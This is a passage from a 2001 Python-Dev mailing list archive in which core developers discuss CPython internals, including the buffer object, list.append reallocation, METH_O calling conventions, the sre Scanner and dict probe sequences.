wanted a reference or view of the > memory/buffer, you would get a reference to this object. You're talking about the buffer object that we have *today*. It can refer to another object (i.e. the memory exposed via the other object's buffer API), refer to memory, or it can allocate its own memory. The buffer object can be marked read-only, or read-write. > 2) objects supporting the buffer object should provide a view method > which returns a copy of themselves (and hence all their methods) and > can be used to get a pointer to a subset of its memory. In this way > the type of memory/buffer being accessed is known compared to the > current buffer object which only indicates the buffer is binary or > char data. In essence information about how the buffer should be used > is lost in the current buffer C/API. I'm not sure that I understand this paragraph. No... what needs to happen is to have the bug in PyBufferObject fixed. Then to refactor stringobject.c and stropmodule.c to move all of those byte-oriented processing functions into a new file such as Python/byteops.c (whatever; name isn't important). Ideally, stringobject.c and stropmodule.c would be simple covers over the same functions. Those functions can then be used by PyBufferObject to implement the rest of the string methods on itself. This would leave us at MAL's suggested point: via the buffer object, we can perform all of the standard string methods/ops on any object that implements the buffer API. Cheers, -g -- Greg Stein, http://www.lyra.org/ From mal at lemburg.com Fri May 25 23:16:32 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 25 May 2001 23:16:32 +0200 Subject: [Python-Dev] Time for the yearly list.append() panic References: Message-ID: <3B0ECBB0.6798F4AB@lemburg.com> Tim Peters wrote: > > Long-term we should teach PyMalloc about Python's realloc() abuses and craft a cooperative solution. That's what I think too. There's really not much point in trying to work around poor malloc() implementations when we've already got the cure built into Python... I just wish Vladimir would resurface again to complete his great work (AFAIK, pymalloc still has problems with threads). -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Fri May 25 23:38:15 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 25 May 2001 23:38:15 +0200 Subject: [Python-Dev] Special-casing "O" References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> Message-ID: <3B0ED0C7.F1A665EA@lemburg.com> "Martin v. Loewis" wrote: > > > Now this would be more flexible if you would implement a scheme > > which lets us put the parser string into the method list. The > > call mechanism could then easily figure out how to call the > > method and it would also be more easily extensible: > > > > {"append", (PyCFunction)listappend, METH_DIRECT, append_doc, "O"}, > > I'd like to hear other people's comment on this specific issue, so I > guess I should probably write a PEP outlining the options. > > My immediate reaction to your proposal is that it only complicates the > interface without any savings. We still can only support a limited > number of calling conventions. E.g. it is not possible to write > portable C code that does all the calling conventions for "l", "ll", > "lll", "llll", and so on - you have to cast the function pointer to > the right prototype, which must be done in source code. > > So with this interface, you may end up at run-time finding out that > you cannot support the signature. With the current patch, you'd have > to know to convert "OO" into METH_OO, which I think is not asked too > much - and it gives you a compile-time error if you use an unsupported > calling convention. True. It's unfortunate that C doesn't offer the reverse of varargs.h... > > A parser marker "OO" would then call a method like this: > > > > method(self, arg0, arg1) > > > > and so on. > > That is indeed the plan, but since you have to code the parameter > combinations in C code, you can only support so many of them. > > > allows implementing a generic scheme which > > then again relies on PyArg_ParseTuple() to do the argument > > parsing, e.g. "is#" could be implemented as: > > The point of the patch is to get rid of PyArg_ParseTuple in the > "common case". For functions with complex calling conventions, getting > rid of the PyArg_ParseTuple string parsing is not that important, > since they are expensive, anyway (not that "is#" couldn't be > supported, I'd call it METH_is_hash). > > > For optional arguments we'd need some convention which then > > lets the called function add the default value as needed. > > For the moment, I'd only support "|O", and perhaps "|z"; an omitted > argument would be represented as a NULL pointer. That means that "|i" > couldn't participate in the fast calling convention - unless we > translate that to > > void foo(PyObject*self, int i, bool ipresent); > > BTW, the most frequent function in my measurements that would make use > of this convention is "OO|i:replace", which scores at 4.5%. I was thinking of using pointer indirection for this: foo(PyObject *self, int *i) If i is given as argument, *i is set to the value, otherwise i is set to NULL. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one at home.com Sat May 26 00:11:43 2001 From: tim.one at home.com (Tim Peters) Date: Fri, 25 May 2001 18:11:43 -0400 Subject: [Python-Dev] Time for the yearly list.append() panic In-Reply-To: <3B0ECBB0.6798F4AB@lemburg.com> Message-ID: [Tim] > Long-term we should teach PyMalloc about Python's realloc() > abuses and craft a cooperative solution. [MAL] > That's what I think too. There's really not much point in trying > to work around poor malloc() implementations when we've already > got the cure built into Python... The point *here* is that a simple localized patch could kill off a Frequently Irritating Complaint without further ado: on my personal cost/benefit scale, it's all I can *afford* to do now. PyMalloc likely won't solve it as-is x-platform, without new work to accommodate extreme realloc() abuse. > I just wish Vladimir would resurface again to complete his great > work I'd like him to come back even if he doesn't . > (AFAIK, pymalloc still has problems with threads). It has lock macros that haven't been #define'd to do anything yet. But part of the potential value of the Python core using its own allocator is to exploit the global interpreter lock to *not* lock in the allocator. Messy issues. Python should grow a cheaper platform-specific flavor of internal lock too. (Jeremy pointed out some code the other day that jumps through hoops to simulate a reentrant lock on top of a Python lock; an irony is that on Windows, the native lock *is* reentrant already, and Python jumps through hoops to make it act as if it weren't ) From mal at lemburg.com Sat May 26 00:07:00 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sat, 26 May 2001 00:07:00 +0200 Subject: [Python-Dev] strop vs. string References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> <3B0E5C50.6E365F69@STScI.Edu> <20010525132752.B5402@lyra.org> Message-ID: <3B0ED784.FC53D01@lemburg.com> Greg Stein wrote: > > No... what needs to happen is to have the bug in PyBufferObject fixed. Then > to refactor stringobject.c and stropmodule.c to move all of those > byte-oriented processing functions into a new file such as Python/byteops.c > (whatever; name isn't important). Ideally, stringobject.c and stropmodule.c > would be simple covers over the same functions. > > Those functions can then be used by PyBufferObject to implement the rest of > the string methods on itself. > > This would leave us at MAL's suggested point: via the buffer object, we can > perform all of the standard string methods/ops on any object that implements > the buffer API. I wonder how we could achieve this without copy&pasting all the needed methods from stringobject.c to bufferobject.c.... all the string methods use the string object layout directly rather than just dealing with a pointer and a length. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From m.favas at per.dem.csiro.au Sat May 26 04:34:20 2001 From: m.favas at per.dem.csiro.au (Mark Favas) Date: Sat, 26 May 2001 10:34:20 +0800 Subject: [Python-Dev] Time for the yearly list.append() panic Message-ID: <3B0F162C.AD16E452@per.dem.csiro.au> [Tim wants to know whether his patch to listobject.c slows anything down on anyone's "oddball box"...] While in no way admitting that mine is an oddball box , it being a Tru64 Unix alpha processor machine, I do see a slowdown after applying the patch (measured on the test suite and on pystone). However, it's only of the order of 0.5 to 1%. slightly-oddly y'rs - Mark -- Mark Favas - m.favas at per.dem.csiro.au CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA From tim.one at home.com Sat May 26 06:05:40 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 26 May 2001 00:05:40 -0400 Subject: [Python-Dev] Time for the yearly list.append() panic In-Reply-To: <3B0F162C.AD16E452@per.dem.csiro.au> Message-ID: [Mark Favas] > [Tim wants to know whether his patch to listobject.c slows anything down > on anyone's "oddball box"...] > > While in no way admitting that mine is an oddball box , Heh -- of course not. I had more in mind obscure OSes like Linux . > it being a Tru64 Unix alpha processor machine, I do see a slowdown > after applying the patch (measured on the test suite and on pystone). > However, it's only of the order of 0.5 to 1%. Now that's very odd, since Alpha has about the slowest integer divsion on Earth, and every list append was doing an int div before the patch but not after. I'm afraid that timing the test suite before and after is a red herring, as several of the expensive tests have (pseudo)random components and can do an amount of work that varies depending on system time at the time random.py is first imported. pystone is even odder: the relevant code in listobject.c is never executed during pystone! I suspected that because pystone is an old synthetic Ada benchmark simulating a pile of integer systems programs, so pystone is unique among Python programs in not exercising any of Python's useful features -- a breakpoint in the debugger just now confirmed it (never did a list resize after compilation finished). So I'm pretty sure that after I check it in, you'll see a speedup instead . Get anywhere identifying why your other app is 20% slower (blast from the past)? From martin at loewis.home.cs.tu-berlin.de Sat May 26 07:28:32 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sat, 26 May 2001 07:28:32 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <3B0ED0C7.F1A665EA@lemburg.com> (mal@lemburg.com) References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> Message-ID: <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> > I was thinking of using pointer indirection for this: > > foo(PyObject *self, int *i) > > If i is given as argument, *i is set to the value, otherwise > i is set to NULL. That is a good idea; I'll try to update my patch to more calling conventions. Regards, Martin From tim.one at home.com Sat May 26 08:44:04 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 26 May 2001 02:44:04 -0400 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0ED784.FC53D01@lemburg.com> Message-ID: The buffer object has been neglected for years: is that because it's in prime shape, or because nobody cares about it enough to maintain it? "The bug" has been known for years without any action taken to address it; the docs give up in spots and nobody addresses that either (like "The current policy seems to state that these characters may be multi-byte characters" -- well, yes or no?); the builtin buffer() function isn't called anywhere in the std test suite; the file object still has an undocumented readinto() method that just confuses people who bump into it; and it's so obscure in daily life that it appears Guido didn't even think of it when adding iterators for the other sequence types. I expect that answers my question . Is someone (Greg? MAL?) going to champion it now? That would be cool. About combining strop and buffers and strings, don't forget unicodeobject.c: that's got oodles of basically duplicate code too. /F suggested dealing with the minor differences via maintaining one code file that gets compiled multiple times w/ appropriate #defines. From tim.one at home.com Sat May 26 10:14:06 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 26 May 2001 04:14:06 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> Message-ID: I don't want to see us duplicate the guts of PyArg_ParseTuple() inside do_call_special(). METH_O is a cool idea, METH_l is marginal, and the new code is already slower for METH_O than it needs to be in order to support the *possibility* of METH_l too (stacks and loops and switch stmts and an extra layer of do_call_special function call "just in case"). Do METH_O, convert every "O" function to use it, declare victory, and enjoy the weekend . 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code- size-ly y'rs - tim From m.favas at per.dem.csiro.au Sat May 26 10:30:29 2001 From: m.favas at per.dem.csiro.au (Mark Favas) Date: Sat, 26 May 2001 16:30:29 +0800 Subject: [Python-Dev] Time for the yearly list.append() panic References: Message-ID: <3B0F69A5.6F569573@per.dem.csiro.au> [Tim tells Mark that his observations reflect more Brownian motion (pseudo!) than reality...] > [Mark Favas] > > it being a Tru64 Unix alpha processor machine, I do see a slowdown > > after applying the patch (measured on the test suite and on pystone). > > However, it's only of the order of 0.5 to 1%. > > Now that's very odd, since Alpha has about the slowest integer divsion on > Earth, and every list append was doing an int div before the patch but not > after. > > I'm afraid that timing the test suite before and after is a red herring, as > several of the expensive tests have (pseudo)random components and can do an > amount of work that varies depending on system time at the time random.py is > first imported. > > pystone is even odder: the relevant code in listobject.c is never executed > during pystone! I suspected that because pystone is an old synthetic Ada > benchmark simulating a pile of integer systems programs, so pystone is > unique among Python programs in not exercising any of Python's useful > features -- a breakpoint in the debugger just now confirmed it (never > did a list resize after compilation finished). > > So I'm pretty sure that after I check it in, you'll see a speedup instead > . OK : this time, instead of making unwarranted assumptions about test suites and pystones , I wrote and ran a test that I _think_ should exercise the code (at least, it does lots of list.append()s), and, yes, the newly checked-in code's about 3-4% faster compared with the original version of, well, days ago. > > Get anywhere identifying why your other app is 20% slower (blast from the > past)? No, not yet. The profiling results at first eyeball seemed hard to match up, so I put it off for a rainy weekend. And Perth's drought has just broken... Will attempt to make sense of it. Interesting that Marc Andre seemed to get a somewhat similar slowdown between 1.52 and 2.0. -- Mark Favas - m.favas at per.dem.csiro.au CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA From mal at lemburg.com Sat May 26 11:54:12 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sat, 26 May 2001 11:54:12 +0200 Subject: [Python-Dev] Special-casing "O" References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> Message-ID: <3B0F7D44.1A12CE0F@lemburg.com> "Martin v. Loewis" wrote: > > > I was thinking of using pointer indirection for this: > > > > foo(PyObject *self, int *i) > > > > If i is given as argument, *i is set to the value, otherwise > > i is set to NULL. > > That is a good idea; I'll try to update my patch to more calling > conventions. This morning another idea popped up which could help us with handling generic callings schemes: How about making *all* parameters pointers ?! The calling mechanism would then just have to deal with an changing number of parameters and not with different types (this is how PyArg_ParseTuple() works too if I remember correctly). We could easily provide calling schemes for 1 - n arguments that way and the types of these arguments would be defined by the parser string just like before. Examples: foo(PyObject *self, PyObject *obj, int *i) bar(PyObject *self, int *i, int *j, char *txt, int *len) To call these, the calling mechanism would have to cast these to: foo(void *, void *, void *) bar(void *, void *, void *, void *, void *) Wouldn't this work ? -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From paulp at ActiveState.com Sat May 26 17:02:08 2001 From: paulp at ActiveState.com (Paul Prescod) Date: Sat, 26 May 2001 08:02:08 -0700 Subject: [Python-Dev] Scanner Message-ID: <3B0FC570.17707787@ActiveState.com> What ever happened to the sre Scanner? It seemed like a good idea but it was not documented and it doesn't work for me. Is it just a case of nobody got around to the documentation or have we decided against it? Here's the code that doesn't work for me: from sre import Scanner scanner = Scanner([ (r"[a-zA-Z_]\w*", None), (r"\d+\.\d*", None), (r"\d+", None), (r"=|\+|-|\*|/", None), (r"\s+", None), ]) tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar") Traceback (most recent call last): File "junk.py", line 11, in ? tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar") File "c:\program files\python21\lib\sre.py", line 254, in scan action = self.lexicon[m.lastindex][1] TypeError: sequence index must be integer m.lastindex is None -- Take a recipe. Leave a recipe. Python Cookbook! http://www.ActiveState.com/pythoncookbook From mal at lemburg.com Sat May 26 17:47:47 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sat, 26 May 2001 17:47:47 +0200 Subject: [Python-Dev] strop vs. string References: Message-ID: <3B0FD023.C4588919@lemburg.com> Tim Peters wrote: > > The buffer object has been neglected for years: is that because it's in > prime shape, or because nobody cares about it enough to maintain it? "The > bug" has been known for years without any action taken to address it; the > docs give up in spots and nobody addresses that either (like "The current > policy seems to state that these characters may be multi-byte characters" -- > well, yes or no?); the builtin buffer() function isn't called anywhere in > the std test suite; the file object still has an undocumented readinto() > method that just confuses people who bump into it; and it's so obscure in > daily life that it appears Guido didn't even think of it when adding > iterators for the other sequence types. > > I expect that answers my question . Is someone (Greg? MAL?) going to > champion it now? That would be cool. I believe that nobody really likes the buffer interface enough to let the world know about it, except maybe Greg ;-) Even the idea of replacing the usage of strings as data buffers with buffer object didn't get very far; common habits are simply hard to break. > About combining strop and buffers and strings, don't forget unicodeobject.c: > that's got oodles of basically duplicate code too. /F suggested dealing > with the minor differences via maintaining one code file that gets compiled > multiple times w/ appropriate #defines. Hmm, that only saves us a few kB in source, but certainly not in the object files. The better idea would be making the types subclass from a generic abstract string object -- I just don't know how this will be possible with Guido's type patches. We'll just have to wait, I guess. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one at home.com Sat May 26 23:15:11 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 26 May 2001 17:15:11 -0400 Subject: [Python-Dev] Scanner In-Reply-To: <3B0FC570.17707787@ActiveState.com> Message-ID: [Paul Prescod] > What ever happened to the sre Scanner? It seemed like a good idea > but it was not documented I previously urged /F to document, and Python-Dev to accept, the .lastindex and .lastgroup match object extensions, but to date got no response. Whether to adopt the Scanner class too is fuzzier, since AFAICT almost nobody has figured out how to use it. > and it doesn't work for me. This isn't a code problem, it's a failure to reverse-engineer the undocumeted API . > Is it just a case of nobody got around to the documentation or have > we decided against it? WRT Scanner, partly the former, nothing of the latter, mostly that there's been no discussion of the API at all. WRT lastindex and lastgroup, I think purely the former. > Here's the code that doesn't work for me: > > from sre import Scanner > > scanner = Scanner([ > (r"[a-zA-Z_]\w*", None), > (r"\d+\.\d*", None), > (r"\d+", None), > (r"=|\+|-|\*|/", None), > (r"\s+", None), > ]) 1. Every tokenization regexp must contain exactly one capturing group. The lack above is the source of your later TypeError. Unclear to me whether that was the intent, or ust the way the code happens to work today. 2. When an action is None, the substring matched by the pattern will be thrown away. You need to supply non-None actions if you want anything to show up in the token list. > tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar") > > Traceback (most recent call last): > File "junk.py", line 11, in ? > tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar") > File "c:\program files\python21\lib\sre.py", line 254, in scan > action = self.lexicon[m.lastindex][1] > TypeError: sequence index must be integer > > m.lastindex is None Here's a working rewrite: from sre import Scanner def retrieve(scanner, group): return group scanner = Scanner([ (r"([a-zA-Z_]\w*)", retrieve), (r"(\d+\.\d*)", retrieve), (r"(\d+)", retrieve), (r"(=|\+|-|\*|/)", retrieve), (r"(\s+)", None), # ignore whitespace ]) tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar") print tokens, `tail` That prints ['sum', '=', '3', '*', 'foo', '+', '312.50', '+', 'bar'] '' In return for that, how about *you* supply a works-on-Windows rewrite of test_urllib2.py? You know more about that than anyone, and the test has been failing for weeks. From MarkH at ActiveState.com Sun May 27 04:39:43 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Sun, 27 May 2001 12:39:43 +1000 Subject: [Python-Dev] strop vs. string In-Reply-To: Message-ID: [Tim] > The buffer object has been neglected for years: is that because it's in > prime shape, or because nobody cares about it enough to maintain it? My take is a little different. I think people could be convinced to care about it, and indeed I do. However, it has one fatal flaw, and no one seems to know what to do about it. The problem is the one best demonstrated with the array module - if you get a pointer to the buffer interface for an array object, but the array then resizes itself, the buffer pointer dangles. There have been a few attempts over time to raise the buffer profile, but this design flaw leaves people scratching their head - it is hard to press for adoption of a feature that has a known crash hiding away. However, addressing this problem is difficult. Guido appears unconvinced that buffer objects and interfaces are that worthwhile. It appears no one else knows how to proceed in the face of this ambivalence - that describes my take even if no one elses. The-buffer-is-dead,-long-live-the-buffer ly, Mark. From tim.one at home.com Sun May 27 08:34:53 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 27 May 2001 02:34:53 -0400 Subject: [Python-Dev] Next dict crusade Message-ID: I'm still trying to work off the backlog of ignored dict ideas. Way back here: http://mail.python.org/pipermail/python-dev/2000-December/011085.html Christian Tismer suggested using polynomial division instead of multiplication for generating the probe sequence, as a way to get all the bits of the hash code into play. The desirability of doing that is illustrated by, e.g., this program: def f(keys): from time import clock d = {} s = clock() for k in keys: d[k] = k f = clock() print "build time %.3f" % (f-s) s = clock() for k in keys: assert d.has_key(k) f = clock() print "search time %.3f" % (f-s) # Excellent performance. keys = range(20000) for i in range(5): f(keys) # Terrible performance; > 500x slower. keys = [i << 16 for i in range(20000)] for i in range(5): f(keys) Christian had a very clever (cheap and effective) solution: Old algortithm (multiplication): shift the index left by 1 if index > mask: xor the index with the generator polynomial New algorithm (division): if low bit of index set: xor the index with the generator polynomial shift the index right by 1 where "index" should really read "increment", and unlike today we do not mask off any of the bits of the initial increment (and that's what lets *all* the bits of the hash code come into play; there's no point to doing this otherwise). I've since discovered that it's got a fatal rare flaw: the new algorithm can generate a 0 increment, while the old algorithm cannot. Example: poly is 131 and hash is 145. Because we don't mask off any bits in computing the initial increment, the initial increment is computed as incr = hash ^ (hash >> 3) == 145 ^ (145 >> 3) == 145 ^ 18 == 131 == poly So if we don't hit on the first probe, the new if low bit of index set: xor the index with the generator polynomial shift the index right by 1 business sets incr to 0, and the result is an infinite loop (0 is a fixed point). I hate to add another branch to this. As is, the existing branch in both the old and new ways is of the worst possible kind: it's taken half the time, with a pseudo-random distribution. So there's not a branch-prediction gimmick on earth it won't fool. Note that there's no reasonable way to identify "bad values" for incr before the loop starts, either -- there's really no way to tell whether incr mod poly is 0 without a loop to do division steps until incr < poly (if incr < poly and incr != 0, incr can never become 0, so there's no more need to test after reaching that point). Such a "pre loop" would cost more than the existing loop in most cases, as we usually get out of the existing loop today on its first iteration. But in that case, what am I worried about ? time-for-a-checkin-ly y'rs - tim From martin at loewis.home.cs.tu-berlin.de Sun May 27 11:01:14 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sun, 27 May 2001 11:01:14 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <3B0F7D44.1A12CE0F@lemburg.com> (mal@lemburg.com) References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> Message-ID: <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> > To call these, the calling mechanism would have to cast these > to: > > foo(void *, void *, void *) > bar(void *, void *, void *, void *, void *) > > Wouldn't this work ? I think it would work, but I doubt it would save much compared to the existing approach. The main point of this patch is to improve efficiency, and (according to Jeremy's analysis), most of the time for calling a function is spend in PyArg_ParseTuple. So if we replace it with another interface that also relies on parsing a string, I doubt we'll improve efficiency. IOW, I won't implement that approach. If you do, I'd be curious to hear the results, of course. Regards, Martin P.S. There would be still cases where PyArg_ParseTuple is needed, e.g. for "O!". From mal at lemburg.com Sun May 27 12:26:27 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sun, 27 May 2001 12:26:27 +0200 Subject: [Python-Dev] Special-casing "O" References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> Message-ID: <3B10D653.4D81E280@lemburg.com> "Martin v. Loewis" wrote: > > > To call these, the calling mechanism would have to cast these > > to: > > > > foo(void *, void *, void *) > > bar(void *, void *, void *, void *, void *) > > > > Wouldn't this work ? > > I think it would work, but I doubt it would save much compared to the > existing approach. The main point of this patch is to improve > efficiency, and (according to Jeremy's analysis), most of the time for > calling a function is spend in PyArg_ParseTuple. So if we replace it > with another interface that also relies on parsing a string, I doubt > we'll improve efficiency. That's the point: we are not replacing PyArg_ParseTuple() with another parsing mechanism, we are only using PyArg_ParseTuple() as fallback solution for parser strings for which we don't provide a special case implementation. The idea is to simply do a strcmp() (*) for a few common combinations (like e.g. "O" and "OO") and then provide the same special case handling like you do with e.g. METH_O. The result would be almost the same w/r to performance and code reduction as with your approach. The only addition would be using strcmp() instead of a switch statement. The advantage of this approach is that while you can still provide special case handling of common parser strings, you can also provide generic APIs for most other parser strings by reverting to PyArg_ParseTuple() for these. > IOW, I won't implement that approach. If you do, I'd be curious to > hear the results, of course. I'll see what I can do... > P.S. There would be still cases where PyArg_ParseTuple is needed, > e.g. for "O!". True... can't win 'em all ;-) -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Sun May 27 12:30:48 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sun, 27 May 2001 12:30:48 +0200 Subject: [Python-Dev] strop vs. string References: Message-ID: <3B10D758.3741AC2F@lemburg.com> Mark Hammond wrote: > > [Tim] > > The buffer object has been neglected for years: is that because it's in > > prime shape, or because nobody cares about it enough to maintain it? > > My take is a little different. I think people could be convinced to care > about it, and indeed I do. However, it has one fatal flaw, and no one seems > to know what to do about it. > > The problem is the one best demonstrated with the array module - if you get > a pointer to the buffer interface for an array object, but the array then > resizes itself, the buffer pointer dangles. I guess there are three ways to "solve" this: a) mutable types don't implement the getreadbuf interface b) the getreadbuf interface is complemented with a callback interface, so the the buffer object can be notified of the change c) calling getreadbuf on a mutable object causes this object to become immutable -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From jeremy at digicool.com Sun May 27 20:51:26 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Sun, 27 May 2001 14:51:26 -0400 (EDT) Subject: [Python-Dev] Special-casing "O" In-Reply-To: <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> Message-ID: <15121.19630.329909.482775@slothrop.digicool.com> >>>>> "MvL" == Martin v Loewis writes: MvL> to the existing approach. The main point of this patch is to MvL> improve efficiency, and (according to Jeremy's analysis), most MvL> of the time for calling a function is spend in MvL> PyArg_ParseTuple. I'd like to qualify this a bit. What I reported earlier is that the BuiltinFuntionCall microbenchmark in pybench spends 30% of its time in PyArg_ParseTuple(). This strikes me as excessive, because it's a static property of the code. (One could imagine writing a Python script that parsed the "O!|is#" format strings and generated efficient, specialized C code for that format.) If we benchmark other programs, particularly those that do more work in the builtins, the relative cost of the argument processing will be lower. Jeremy From jeremy at digicool.com Sun May 27 20:55:36 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Sun, 27 May 2001 14:55:36 -0400 (EDT) Subject: [Python-Dev] Special-casing "O" In-Reply-To: References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> Message-ID: <15121.19880.775931.946049@slothrop.digicool.com> >>>>> "TP" == Tim Peters writes: TP> Do METH_O, convert every "O" function to use it, declare TP> victory, and enjoy the weekend . TP> 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code- TP> size-ly y'rs - tim How is METH_O different than METH_OLDARGS? The old-style argument passing is definitely the most efficient for functions of a zero or one arguments. There's special-case code in ceval to support it these cases -- fast_cfunction() -- primarily because in these cases the function can be invoked by using arguments directly from the Python stack instead of copying them to a tuple first. Jeremy From tim.one at home.com Sun May 27 22:37:43 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 27 May 2001 16:37:43 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <15121.19880.775931.946049@slothrop.digicool.com> Message-ID: [Jeremy] > How is METH_O different than METH_OLDARGS? I have no idea: can you explain it? The #define's for these symbols are uncommented, and it's a mystery to me what they're *supposed* to mean. > The old-style argument passing is definitely the most efficient for > functions of a zero or one arguments. There's special-case code in > ceval to support it these cases -- fast_cfunction() -- primarily > because in these cases the function can be invoked by using arguments > directly from the Python stack instead of copying them to a tuple > first. OK, I'm looking in bltinmodule.c, at builtin_len. It starts like so: static PyObject * builtin_len(PyObject *self, PyObject *args) { PyObject *v; long res; if (!PyArg_ParseTuple(args, "O:len", &v)) return NULL; So it's clearly expecting a tuple. But its entry in the builtin_methods[] table is: {"len", builtin_len, 1, len_doc}, That is, it says nothing about the calling convention. Since C fills in a 0 for missing values, and methodobject.c has /* Flag passed to newmethodobject */ #define METH_OLDARGS 0x0000 #define METH_VARARGS 0x0001 #define METH_KEYWORDS 0x0002 then doesn't the stuct for builtin_len implicitly specify METH_OLDARGS? But if that's true, and fast_cfunction() does not create a tuple in this case, how is that builtin_len gets a tuple? Something doesn't add up here. Or does it? There's no *reference* to METH_OLDARGS anywhere in the code base other than its definition and its use in method tables, so whatever code *keys* off it must be assuming a hardcoded 0 value for it -- or indeed nothing keys off it at all. I expect this line in ceval.c is doing the dirty assumption: } else if (flags == 0) { and should be testing against METH_OLDARGS instead. But I see that builtin_len is falling into the METH_VARARGS case despite that it wasn't declared that way and that it sure looks like METH_OLDARGS (0) is the default. Confusing! Fix it . From tim.one at home.com Sun May 27 22:46:29 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 27 May 2001 16:46:29 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: Message-ID: [Tim, thrashing] > ... > So it's clearly expecting a tuple. But its entry in the builtin_methods[] > table is: > > {"len", builtin_len, 1, len_doc}, > > That is, it says nothing about the calling convention. Oops, it does, using a hardcoded 1 instead of the METH_VARARGS #define. So that explains that. Next question: why isn't builtin_len using METH_OLDARGS instead? Is there some advantage to using METH_VARARGS in this case? This gets back to what these #defines are intended to *mean*, and I still haven't figured that out. From mwh at python.net Sun May 27 23:32:48 2001 From: mwh at python.net (Michael Hudson) Date: Sun, 27 May 2001 22:32:48 +0100 (BST) Subject: [Python-Dev] Special-casing "O" In-Reply-To: Message-ID: On Sun, 27 May 2001, Tim Peters wrote: > Next question: why isn't builtin_len using METH_OLDARGS instead? Is > there some advantage to using METH_VARARGS in this case? So you can't do >>> len(1,2) 2 a la list.append, socket.connect pre 2.0? (or was it 1.6?) My imprssion is that generally 